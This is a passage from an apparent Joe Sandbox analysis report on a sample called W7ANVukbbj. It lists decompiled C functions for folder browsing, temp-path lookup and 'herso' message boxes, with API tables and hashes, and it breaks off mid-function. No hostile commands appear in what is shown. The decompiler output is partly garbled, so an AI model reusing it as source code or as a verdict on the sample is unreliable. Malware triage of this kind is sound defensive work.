                                                                                                                                                                                                          • SetEvent.KERNEL32(00861140,00000000,00000020,00000004), ref: 00863590
                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 008635C7
                                                                                                                                                                                                          • GetDlgItem.USER32(?,0000083B), ref: 008635F1
                                                                                                                                                                                                          • SendMessageA.USER32(00000000), ref: 008635F8
                                                                                                                                                                                                          • GetDlgItem.USER32(?,0000083B), ref: 00863610
                                                                                                                                                                                                          • SendMessageA.USER32(00000000), ref: 00863617
                                                                                                                                                                                                          • SetWindowTextA.USER32(?,herso), ref: 00863623
                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 00863637
                                                                                                                                                                                                          • EndDialog.USER32(?,00000000), ref: 00863671
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                          • String ID: herso
                                                                                                                                                                                                          • API String ID: 2406144884-3992069730
                                                                                                                                                                                                          • Opcode ID: df693269b096d80a3b8bd838a778da1c21e41fddf954da649bd7d05b46df9dce
                                                                                                                                                                                                          • Instruction ID: 3efca264dda332f53276de00d840d7eb5ac7a675ea4d979d21fd54b3af8bd227
                                                                                                                                                                                                          • Opcode Fuzzy Hash: df693269b096d80a3b8bd838a778da1c21e41fddf954da649bd7d05b46df9dce
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B31A0B0240300BBDB241F25EC4DE2A3A69F796B01F136629F617E62A0CFB58A00DE55
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 50%
                                                                                                                                                                                                          			E00864224(char __ecx) {
                                                                                                                                                                                                          				char* _v8;
                                                                                                                                                                                                          				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                          				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                          				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                          				char* _v28;
                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                                          				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                          				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                          				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                          				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                          				char _t42;
                                                                                                                                                                                                          				char* _t44;
                                                                                                                                                                                                          				char* _t61;
                                                                                                                                                                                                          				void* _t63;
                                                                                                                                                                                                          				char* _t65;
                                                                                                                                                                                                          				struct HINSTANCE__* _t66;
                                                                                                                                                                                                          				char _t67;
                                                                                                                                                                                                          				void* _t71;
                                                                                                                                                                                                          				char _t76;
                                                                                                                                                                                                          				intOrPtr _t85;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t67 = __ecx;
                                                                                                                                                                                                          				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                          				if(_t66 == 0) {
                                                                                                                                                                                                          					_t63 = 0x4c2;
                                                                                                                                                                                                          					L22:
                                                                                                                                                                                                          					E008644B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                          				_v12 = _t26;
                                                                                                                                                                                                          				if(_t26 == 0) {
                                                                                                                                                                                                          					L20:
                                                                                                                                                                                                          					FreeLibrary(_t66);
                                                                                                                                                                                                          					_t63 = 0x4c1;
                                                                                                                                                                                                          					goto L22;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                          				_v20 = _t28;
                                                                                                                                                                                                          				if(_t28 == 0) {
                                                                                                                                                                                                          					goto L20;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                          				_v16 = _t29;
                                                                                                                                                                                                          				if(_t29 == 0) {
                                                                                                                                                                                                          					goto L20;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t76 =  *0x8688c0; // 0x0
                                                                                                                                                                                                          				if(_t76 != 0) {
                                                                                                                                                                                                          					L10:
                                                                                                                                                                                                          					 *0x8687a0 = 0;
                                                                                                                                                                                                          					_v52 = _t67;
                                                                                                                                                                                                          					_v48 = 0;
                                                                                                                                                                                                          					_v44 = 0;
                                                                                                                                                                                                          					_v40 = 0x868598;
                                                                                                                                                                                                          					_v36 = 1;
                                                                                                                                                                                                          					_v32 = E00864200;
                                                                                                                                                                                                          					_v28 = 0x8688c0;
                                                                                                                                                                                                          					 *0x86a288( &_v52);
                                                                                                                                                                                                          					_t32 =  *_v12();
                                                                                                                                                                                                          					if(_t71 != _t71) {
                                                                                                                                                                                                          						asm("int 0x29");
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_v12 = _t32;
                                                                                                                                                                                                          					if(_t32 != 0) {
                                                                                                                                                                                                          						 *0x86a288(_t32, 0x8688c0);
                                                                                                                                                                                                          						 *_v16();
                                                                                                                                                                                                          						if(_t71 != _t71) {
                                                                                                                                                                                                          							asm("int 0x29");
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						if( *0x8688c0 != 0) {
                                                                                                                                                                                                          							E00861680(0x8687a0, 0x104, 0x8688c0);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						 *0x86a288(_v12);
                                                                                                                                                                                                          						 *_v20();
                                                                                                                                                                                                          						if(_t71 != _t71) {
                                                                                                                                                                                                          							asm("int 0x29");
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					FreeLibrary(_t66);
                                                                                                                                                                                                          					_t85 =  *0x8687a0; // 0x0
                                                                                                                                                                                                          					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					GetTempPathA(0x104, 0x8688c0);
                                                                                                                                                                                                          					_t61 = 0x8688c0;
                                                                                                                                                                                                          					_t4 =  &(_t61[1]); // 0x8688c1
                                                                                                                                                                                                          					_t65 = _t4;
                                                                                                                                                                                                          					do {
                                                                                                                                                                                                          						_t42 =  *_t61;
                                                                                                                                                                                                          						_t61 =  &(_t61[1]);
                                                                                                                                                                                                          					} while (_t42 != 0);
                                                                                                                                                                                                          					_t5 = _t61 - _t65 + 0x8688c0; // 0x10d1181
                                                                                                                                                                                                          					_t44 = CharPrevA(0x8688c0, _t5);
                                                                                                                                                                                                          					_v8 = _t44;
                                                                                                                                                                                                          					if( *_t44 == 0x5c &&  *(CharPrevA(0x8688c0, _t44)) != 0x3a) {
                                                                                                                                                                                                          						 *_v8 = 0;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					goto L10;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}




























                                                                                                                                                                                                          0x00864234
                                                                                                                                                                                                          0x0086423c
                                                                                                                                                                                                          0x00864240
                                                                                                                                                                                                          0x008643b2
                                                                                                                                                                                                          0x008643b7
                                                                                                                                                                                                          0x008643c0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008643c5
                                                                                                                                                                                                          0x0086424c
                                                                                                                                                                                                          0x00864252
                                                                                                                                                                                                          0x00864257
                                                                                                                                                                                                          0x008643a4
                                                                                                                                                                                                          0x008643a5
                                                                                                                                                                                                          0x008643ab
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008643ab
                                                                                                                                                                                                          0x00864263
                                                                                                                                                                                                          0x00864269
                                                                                                                                                                                                          0x0086426e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086427a
                                                                                                                                                                                                          0x00864280
                                                                                                                                                                                                          0x00864285
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086428d
                                                                                                                                                                                                          0x00864293
                                                                                                                                                                                                          0x008642e6
                                                                                                                                                                                                          0x008642e9
                                                                                                                                                                                                          0x008642ef
                                                                                                                                                                                                          0x008642f4
                                                                                                                                                                                                          0x008642f7
                                                                                                                                                                                                          0x00864300
                                                                                                                                                                                                          0x00864307
                                                                                                                                                                                                          0x0086430e
                                                                                                                                                                                                          0x00864315
                                                                                                                                                                                                          0x0086431c
                                                                                                                                                                                                          0x00864322
                                                                                                                                                                                                          0x00864326
                                                                                                                                                                                                          0x0086432d
                                                                                                                                                                                                          0x0086432d
                                                                                                                                                                                                          0x0086432f
                                                                                                                                                                                                          0x00864334
                                                                                                                                                                                                          0x00864343
                                                                                                                                                                                                          0x00864349
                                                                                                                                                                                                          0x0086434d
                                                                                                                                                                                                          0x00864354
                                                                                                                                                                                                          0x00864354
                                                                                                                                                                                                          0x0086435d
                                                                                                                                                                                                          0x0086436e
                                                                                                                                                                                                          0x0086436e
                                                                                                                                                                                                          0x0086437d
                                                                                                                                                                                                          0x00864383
                                                                                                                                                                                                          0x00864387
                                                                                                                                                                                                          0x0086438e
                                                                                                                                                                                                          0x0086438e
                                                                                                                                                                                                          0x00864387
                                                                                                                                                                                                          0x00864391
                                                                                                                                                                                                          0x00864399
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00864295
                                                                                                                                                                                                          0x0086429f
                                                                                                                                                                                                          0x008642a5
                                                                                                                                                                                                          0x008642aa
                                                                                                                                                                                                          0x008642aa
                                                                                                                                                                                                          0x008642ad
                                                                                                                                                                                                          0x008642ad
                                                                                                                                                                                                          0x008642af
                                                                                                                                                                                                          0x008642b0
                                                                                                                                                                                                          0x008642b6
                                                                                                                                                                                                          0x008642c2
                                                                                                                                                                                                          0x008642c8
                                                                                                                                                                                                          0x008642ce
                                                                                                                                                                                                          0x008642e4
                                                                                                                                                                                                          0x008642e4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008642ce

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00864236
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0086424C
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00864263
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0086427A
                                                                                                                                                                                                          • GetTempPathA.KERNEL32(00000104,008688C0,?,00000001), ref: 0086429F
                                                                                                                                                                                                          • CharPrevA.USER32(008688C0,010D1181,?,00000001), ref: 008642C2
                                                                                                                                                                                                          • CharPrevA.USER32(008688C0,00000000,?,00000001), ref: 008642D6
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00864391
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 008643A5
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                          • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                          • API String ID: 1865808269-1731843650
                                                                                                                                                                                                          • Opcode ID: 40ff0eab815e20acfe3bcaea07dc378ebfeacda7149f2ae75217bbc4e275fee5
                                                                                                                                                                                                          • Instruction ID: a9d99745daae66cb7c032c301ef749768f57d39942350bef7d9ca4bcf0445e8c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40ff0eab815e20acfe3bcaea07dc378ebfeacda7149f2ae75217bbc4e275fee5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B741E5B4A00204EFD711AFA4EC98A6E7BB4FB45344F172269EA45E7351CFB48C45CB62
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                                          			E008644B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v64;
                                                                                                                                                                                                          				char _v576;
                                                                                                                                                                                                          				void* _v580;
                                                                                                                                                                                                          				struct HWND__* _v584;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t34;
                                                                                                                                                                                                          				void* _t37;
                                                                                                                                                                                                          				signed int _t39;
                                                                                                                                                                                                          				intOrPtr _t43;
                                                                                                                                                                                                          				signed int _t44;
                                                                                                                                                                                                          				signed int _t49;
                                                                                                                                                                                                          				signed int _t52;
                                                                                                                                                                                                          				void* _t54;
                                                                                                                                                                                                          				intOrPtr _t55;
                                                                                                                                                                                                          				intOrPtr _t58;
                                                                                                                                                                                                          				intOrPtr _t59;
                                                                                                                                                                                                          				int _t64;
                                                                                                                                                                                                          				void* _t66;
                                                                                                                                                                                                          				intOrPtr* _t67;
                                                                                                                                                                                                          				signed int _t69;
                                                                                                                                                                                                          				intOrPtr* _t73;
                                                                                                                                                                                                          				intOrPtr* _t76;
                                                                                                                                                                                                          				intOrPtr* _t77;
                                                                                                                                                                                                          				void* _t80;
                                                                                                                                                                                                          				void* _t81;
                                                                                                                                                                                                          				void* _t82;
                                                                                                                                                                                                          				intOrPtr* _t84;
                                                                                                                                                                                                          				void* _t85;
                                                                                                                                                                                                          				signed int _t89;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t75 = __edx;
                                                                                                                                                                                                          				_t34 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                          				_v584 = __ecx;
                                                                                                                                                                                                          				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                          				_t67 = _a4;
                                                                                                                                                                                                          				_t69 = 0xd;
                                                                                                                                                                                                          				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                          				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                          				_v580 = _t37;
                                                                                                                                                                                                          				asm("movsb");
                                                                                                                                                                                                          				if(( *0x868a38 & 0x00000001) != 0) {
                                                                                                                                                                                                          					_t39 = 1;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_v576 = 0;
                                                                                                                                                                                                          					LoadStringA( *0x869a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                          					if(_v576 != 0) {
                                                                                                                                                                                                          						_t73 =  &_v576;
                                                                                                                                                                                                          						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                          						_t75 = _t16;
                                                                                                                                                                                                          						do {
                                                                                                                                                                                                          							_t43 =  *_t73;
                                                                                                                                                                                                          							_t73 = _t73 + 1;
                                                                                                                                                                                                          						} while (_t43 != 0);
                                                                                                                                                                                                          						_t84 = _v580;
                                                                                                                                                                                                          						_t74 = _t73 - _t75;
                                                                                                                                                                                                          						if(_t84 == 0) {
                                                                                                                                                                                                          							if(_t67 == 0) {
                                                                                                                                                                                                          								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                          								_t83 = _t27;
                                                                                                                                                                                                          								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                          								_t80 = _t44;
                                                                                                                                                                                                          								if(_t80 == 0) {
                                                                                                                                                                                                          									goto L6;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									_t75 = _t83;
                                                                                                                                                                                                          									_t74 = _t80;
                                                                                                                                                                                                          									E00861680(_t80, _t83,  &_v576);
                                                                                                                                                                                                          									goto L23;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t76 = _t67;
                                                                                                                                                                                                          								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                          								_t85 = _t24;
                                                                                                                                                                                                          								do {
                                                                                                                                                                                                          									_t55 =  *_t76;
                                                                                                                                                                                                          									_t76 = _t76 + 1;
                                                                                                                                                                                                          								} while (_t55 != 0);
                                                                                                                                                                                                          								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                          								_t83 = _t25 + _t74;
                                                                                                                                                                                                          								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                          								_t80 = _t44;
                                                                                                                                                                                                          								if(_t80 == 0) {
                                                                                                                                                                                                          									goto L6;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									E0086171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                          									goto L23;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t77 = _t67;
                                                                                                                                                                                                          							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                          							_t81 = _t18;
                                                                                                                                                                                                          							do {
                                                                                                                                                                                                          								_t58 =  *_t77;
                                                                                                                                                                                                          								_t77 = _t77 + 1;
                                                                                                                                                                                                          							} while (_t58 != 0);
                                                                                                                                                                                                          							_t75 = _t77 - _t81;
                                                                                                                                                                                                          							_t82 = _t84 + 1;
                                                                                                                                                                                                          							do {
                                                                                                                                                                                                          								_t59 =  *_t84;
                                                                                                                                                                                                          								_t84 = _t84 + 1;
                                                                                                                                                                                                          							} while (_t59 != 0);
                                                                                                                                                                                                          							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                          							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                          							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                          							_t80 = _t44;
                                                                                                                                                                                                          							if(_t80 == 0) {
                                                                                                                                                                                                          								goto L6;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_push(_v580);
                                                                                                                                                                                                          								E0086171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                          								L23:
                                                                                                                                                                                                          								MessageBeep(_a12);
                                                                                                                                                                                                          								if(E0086681F(_t67) == 0) {
                                                                                                                                                                                                          									L25:
                                                                                                                                                                                                          									_t49 = 0x10000;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									_t54 = E008667C9(_t74, _t74);
                                                                                                                                                                                                          									_t49 = 0x190000;
                                                                                                                                                                                                          									if(_t54 == 0) {
                                                                                                                                                                                                          										goto L25;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t52 = MessageBoxA(_v584, _t80, "herso", _t49 | _a12 | _a16);
                                                                                                                                                                                                          								_t83 = _t52;
                                                                                                                                                                                                          								LocalFree(_t80);
                                                                                                                                                                                                          								_t39 = _t52;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						if(E0086681F(_t67) == 0) {
                                                                                                                                                                                                          							L4:
                                                                                                                                                                                                          							_t64 = 0x10010;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t66 = E008667C9(0, 0);
                                                                                                                                                                                                          							_t64 = 0x190010;
                                                                                                                                                                                                          							if(_t66 == 0) {
                                                                                                                                                                                                          								goto L4;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t44 = MessageBoxA(_v584,  &_v64, "herso", _t64);
                                                                                                                                                                                                          						L6:
                                                                                                                                                                                                          						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E00866CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                          			}



































                                                                                                                                                                                                          0x008644b9
                                                                                                                                                                                                          0x008644c4
                                                                                                                                                                                                          0x008644cb
                                                                                                                                                                                                          0x008644d8
                                                                                                                                                                                                          0x008644e4
                                                                                                                                                                                                          0x008644eb
                                                                                                                                                                                                          0x008644ee
                                                                                                                                                                                                          0x008644ef
                                                                                                                                                                                                          0x008644ef
                                                                                                                                                                                                          0x008644f1
                                                                                                                                                                                                          0x008644f7
                                                                                                                                                                                                          0x008644f8
                                                                                                                                                                                                          0x0086467b
                                                                                                                                                                                                          0x008644fe
                                                                                                                                                                                                          0x00864509
                                                                                                                                                                                                          0x00864518
                                                                                                                                                                                                          0x00864525
                                                                                                                                                                                                          0x00864562
                                                                                                                                                                                                          0x00864568
                                                                                                                                                                                                          0x00864568
                                                                                                                                                                                                          0x0086456b
                                                                                                                                                                                                          0x0086456b
                                                                                                                                                                                                          0x0086456d
                                                                                                                                                                                                          0x0086456e
                                                                                                                                                                                                          0x00864572
                                                                                                                                                                                                          0x00864578
                                                                                                                                                                                                          0x0086457c
                                                                                                                                                                                                          0x008645cb
                                                                                                                                                                                                          0x00864607
                                                                                                                                                                                                          0x00864607
                                                                                                                                                                                                          0x0086460d
                                                                                                                                                                                                          0x00864613
                                                                                                                                                                                                          0x00864617
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086461d
                                                                                                                                                                                                          0x00864623
                                                                                                                                                                                                          0x00864626
                                                                                                                                                                                                          0x00864628
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00864628
                                                                                                                                                                                                          0x008645cd
                                                                                                                                                                                                          0x008645cd
                                                                                                                                                                                                          0x008645cf
                                                                                                                                                                                                          0x008645cf
                                                                                                                                                                                                          0x008645d2
                                                                                                                                                                                                          0x008645d2
                                                                                                                                                                                                          0x008645d4
                                                                                                                                                                                                          0x008645d5
                                                                                                                                                                                                          0x008645db
                                                                                                                                                                                                          0x008645de
                                                                                                                                                                                                          0x008645e3
                                                                                                                                                                                                          0x008645e9
                                                                                                                                                                                                          0x008645ed
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008645f3
                                                                                                                                                                                                          0x008645fd
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00864602
                                                                                                                                                                                                          0x008645ed
                                                                                                                                                                                                          0x0086457e
                                                                                                                                                                                                          0x0086457e
                                                                                                                                                                                                          0x00864580
                                                                                                                                                                                                          0x00864580
                                                                                                                                                                                                          0x00864583
                                                                                                                                                                                                          0x00864583
                                                                                                                                                                                                          0x00864585
                                                                                                                                                                                                          0x00864586
                                                                                                                                                                                                          0x0086458a
                                                                                                                                                                                                          0x0086458c
                                                                                                                                                                                                          0x0086458f
                                                                                                                                                                                                          0x0086458f
                                                                                                                                                                                                          0x00864591
                                                                                                                                                                                                          0x00864592
                                                                                                                                                                                                          0x0086459b
                                                                                                                                                                                                          0x0086459e
                                                                                                                                                                                                          0x008645a3
                                                                                                                                                                                                          0x008645a9
                                                                                                                                                                                                          0x008645ad
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008645af
                                                                                                                                                                                                          0x008645af
                                                                                                                                                                                                          0x008645bf
                                                                                                                                                                                                          0x0086462d
                                                                                                                                                                                                          0x00864630
                                                                                                                                                                                                          0x0086463d
                                                                                                                                                                                                          0x0086464e
                                                                                                                                                                                                          0x0086464e
                                                                                                                                                                                                          0x0086463f
                                                                                                                                                                                                          0x00864640
                                                                                                                                                                                                          0x00864647
                                                                                                                                                                                                          0x0086464c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086464c
                                                                                                                                                                                                          0x00864666
                                                                                                                                                                                                          0x0086466d
                                                                                                                                                                                                          0x0086466f
                                                                                                                                                                                                          0x00864675
                                                                                                                                                                                                          0x00864675
                                                                                                                                                                                                          0x008645ad
                                                                                                                                                                                                          0x00864527
                                                                                                                                                                                                          0x0086452e
                                                                                                                                                                                                          0x0086453f
                                                                                                                                                                                                          0x0086453f
                                                                                                                                                                                                          0x00864530
                                                                                                                                                                                                          0x00864531
                                                                                                                                                                                                          0x00864538
                                                                                                                                                                                                          0x0086453d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086453d
                                                                                                                                                                                                          0x00864554
                                                                                                                                                                                                          0x0086455a
                                                                                                                                                                                                          0x0086455a
                                                                                                                                                                                                          0x0086455a
                                                                                                                                                                                                          0x00864525
                                                                                                                                                                                                          0x0086468c

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00864518
                                                                                                                                                                                                          • MessageBoxA.USER32(?,?,herso,00010010), ref: 00864554
                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000065), ref: 008645A3
                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000065), ref: 008645E3
                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000002), ref: 0086460D
                                                                                                                                                                                                          • MessageBeep.USER32(00000000), ref: 00864630
                                                                                                                                                                                                          • MessageBoxA.USER32(?,00000000,herso,00000000), ref: 00864666
                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000), ref: 0086466F
                                                                                                                                                                                                            • Part of subcall function 0086681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0086686E
                                                                                                                                                                                                            • Part of subcall function 0086681F: GetSystemMetrics.USER32(0000004A), ref: 008668A7
                                                                                                                                                                                                            • Part of subcall function 0086681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 008668CC
                                                                                                                                                                                                            • Part of subcall function 0086681F: RegQueryValueExA.ADVAPI32(?,00861140,00000000,?,?,0000000C), ref: 008668F4
                                                                                                                                                                                                            • Part of subcall function 0086681F: RegCloseKey.ADVAPI32(?), ref: 00866902
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                          • String ID: LoadString() Error. Could not load string resource.$herso
                                                                                                                                                                                                          • API String ID: 3244514340-1944528445
                                                                                                                                                                                                          • Opcode ID: a1920f022478b868445f151794235f325e591aa35404e2191e604e3dfd642892
                                                                                                                                                                                                          • Instruction ID: cf4616718ed0a6d44b11a6c52a5438071b21bab17ba0f953e7d5ae28a763c8e6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1920f022478b868445f151794235f325e591aa35404e2191e604e3dfd642892
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA512672900219AFDB219F28CC48BAABB69FF46304F165194FD1AF7241DB71DD05CB61
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                                          			E00862773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                          				char _v269;
                                                                                                                                                                                                          				CHAR* _v276;
                                                                                                                                                                                                          				int _v280;
                                                                                                                                                                                                          				void* _v284;
                                                                                                                                                                                                          				int _v288;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t23;
